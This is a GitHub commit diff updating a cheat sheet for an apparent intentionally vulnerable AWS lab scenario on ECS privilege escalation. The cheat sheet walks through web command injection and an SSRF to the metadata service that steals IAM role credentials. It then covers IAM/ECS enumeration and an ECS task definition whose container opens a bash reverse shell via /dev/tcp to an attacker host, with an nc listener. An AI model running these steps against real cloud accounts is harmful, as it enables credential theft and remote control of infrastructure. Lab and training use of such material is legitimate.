Skip to content

Commit

Permalink
Update scenario's cheat_sheet.md.
Browse files Browse the repository at this point in the history
  • Loading branch information
3iuy-prog committed Dec 13, 2023
1 parent fbd6278 commit 928ad74
Showing 1 changed file with 92 additions and 41 deletions.
133 changes: 92 additions & 41 deletions scenarios/ecs_privesc_evade_protection/cheat_sheet.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,15 +4,17 @@ Go to `http://<ec2_ip_address>`

### Command Injection

```
```bash
# Command Injection on web.
; aws s3 ls
; aws s3 ls s3://<bucket-name>/
; aws s3 cp s3://<bucket-name>/flag.txt .
; cat flag.txt
```

### SSRF
```

```bash
# SSRF Attack.
http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>

Expand All @@ -34,11 +36,13 @@ Go to `http://<ec2_ip_address>`

### SSRF

```
http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>
aws configure --profile attacker
echo "aws_session_token = <token>" >> ~/.aws/credentials
```
* Using IPv6 to SSRF on web with `http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>`
* Get credentials & using it to your CLI profile.

```bash
aws configure --profile attacker
echo "aws_session_token = <token>" >> ~/.aws/credentials
```

### Command Injection

Expand All @@ -47,49 +51,96 @@ echo "aws_session_token = <token>" >> ~/.aws/credentials

### For more information

- more information about iam
- more information about iam.

```
aws sts get-caller-identity
aws iam get-role --role-name <role>
aws iam list-attached-role-policies --role-name <role>
aws iam list-role-policies --role-name <role>
aws iam get-role-policy --role-name <role> --policy-name <policy>
aws iam list-roles
```
```bash
aws sts get-caller-identity
aws iam list-roles
aws iam get-role --role-name <role>
aws iam list-attached-role-policies --role-name <role>
aws iam list-role-policies --role-name <role>
aws iam get-role-policy --role-name <role> --policy-name <policy>
````
- more information about ecs
- more information about ecs clusters.
```
aws ecs list-clusters --region <region>
aws ecs describe-clusters --region <region> --clusters <cluster>
aws ecs list-container-instances --region <region> --cluster <cluster_arn>
```

### ECS Privesc

* Attacker prepare revshell at other public ip point with `nc -lvp 4000`.
```bash
aws ecs list-clusters --region <region>
aws ecs describe-clusters --region <region> --clusters <cluster>
aws ecs list-container-instances --region <region> --cluster <cluster_arn>
```
- find available vpc subnets.

* And now come back to CLI.
```bash
aws ec2 describe-subnets --region <region>
```

```
# ECS Task definition with revshell command.
aws ecs register-task-definition --region <region> --family <task_name> --task-role-arn <task_role_arn> --network-mode "awsvpc" --cpu 256 --memory 512 --requires-compatibilities "[\"FARGATE\"]" --container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\"\"]}]"
### ECS Privesc

# For run-task, find available subnets.
aws ec2 describe-subnets --region <region>
# Run task.
aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_arn> --launch-type FARGATE --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"<subnet>\"]}}"
```
After a few minutes, the revshell will be connected by container.
Let's do it on revshell.
1. Attacker prepare revshell at other public ip point with `nc -lvp 4000`.

2. And now come back to CLI.

3. Create an ECS Task Definition JSON File:

Create a file named task-definition.json and include the following content.
Replace `<region>`, `<task_name>`, `<task_role_arn>`, `<revshell_ip>`, and `<revshell_port>` with your actual values.

```json
{
"family": "<task_name>",
"taskRoleArn": "<task_role_arn>",
"networkMode": "awsvpc",
"cpu": "256",
"memory": "512",
"requiresCompatibilities": ["FARGATE"],
"containerDefinitions": [
{
"name": "exfil_creds",
"image": "python:latest",
"entryPoint": ["sh", "-c"],
"command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\""]
}
]
}
```

4. Create an ECS Run Task JSON File.

Create a file named run-task.json and include the following content. Replace `<subnet>` with the actual values for your setup.

```json
{
"launchType": "FARGATE",
"networkConfiguration": {
"awsvpcConfiguration": {
"assignPublicIp": "ENABLED",
"subnets": ["<subnet>"]
}
}
}
```

5. Register Task Definition and Run Task

Now, you can use the AWS CLI with the JSON files to execute the commands.

```bash
# Register task definition
aws ecs register-task-definition --region <region> --cli-input-json file://task-definition.json
# Run task
aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_name> --cli-input-json file://run-task.json
```

After a few minutes, the revshell will be connected by container.
Let's access to s3 on revshell.
### Access S3
```
apt-get update
apt-get install awscli
```bash
apt update
apt install awscli
aws s3 ls
aws s3 ls s3://<bucket-name>/
Expand Down

0 comments on commit 928ad74

Please sign in to comment.